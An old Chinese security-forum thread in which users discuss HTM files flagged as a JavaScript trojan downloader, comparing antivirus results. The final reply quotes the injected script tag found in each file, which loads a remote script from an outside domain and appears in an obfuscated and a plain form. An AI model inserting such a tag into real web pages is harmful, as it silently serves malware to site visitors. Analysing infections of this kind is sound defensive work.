木马？

显示全部楼层 · 发表于 2008-1-23 19:55:58

今天用了下江民的在线扫描，发现N个HTM文件报告是病毒 Trojan Downloader.JS.Agent.dg

但用小红伞和卡巴斯基的在线扫描都没发现病毒，因为今天用360查出过未知系统镜像劫持，所有不敢忽视。

显示全部楼层 · 发表于 2008-1-23 19:57:17

没有问题！安全！

显示全部楼层 · 发表于 2008-1-23 19:59:02

小红伞没反应，里面貌似都是HTML文件

显示全部楼层 · 发表于 2008-1-23 20:03:41

我同学用卡巴斯基扫描出来是病毒，怎么卡巴斯基的在线扫描不报病毒.....

显示全部楼层 · 发表于 2008-1-23 20:08:28

MD5: 8c11136754a438fd86dc5c05c42ee763
级别评分: 0.0
动作: 在线扫描

状态: 它是一个“病毒”

显示全部楼层 · 发表于 2008-1-23 20:11:29

ACCESS DENIED
The requested URL could not be retrieved

--------------------------------------------------------------------------------

While trying to retrieve the URL: http://bbs.kafan.cn/attachment.php?aid=188735

The folowing error was encountered:

The requested object is INFECTED. The following viruses Virus.Win32.Xorer.du were found

Please contact your service provider if you feel this is incorrect.

--------------------------------------------------------------------------------

Generated Wed Jan 23 20:10:36 2008 by Kaspersky Anti-Virus 7.0

显示全部楼层 · 发表于 2008-1-23 20:13:52

我选择了其中9个文件上存到VIRSCAN扫描，结果发现没病毒：
http://virscan.org/report/4d4f8b1bc57394a3c66aac93bb97ebe4.html

显示全部楼层 · 发表于 2008-1-23 20:23:54

被感染的，可以清毒

显示全部楼层 · 发表于 2008-1-24 00:40:30

肯定是感染了恶意代码已经被清除了~

显示全部楼层 · 发表于 2008-1-24 00:55:41

每个文件都加了一段
<script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>

<script src="http://js.k0102.com/01.asp"></script>

[病毒样本] 木马？

本帖子中包含更多资源

本帖子中包含更多资源

回复 1楼 spatra 的帖子

浏览过的版块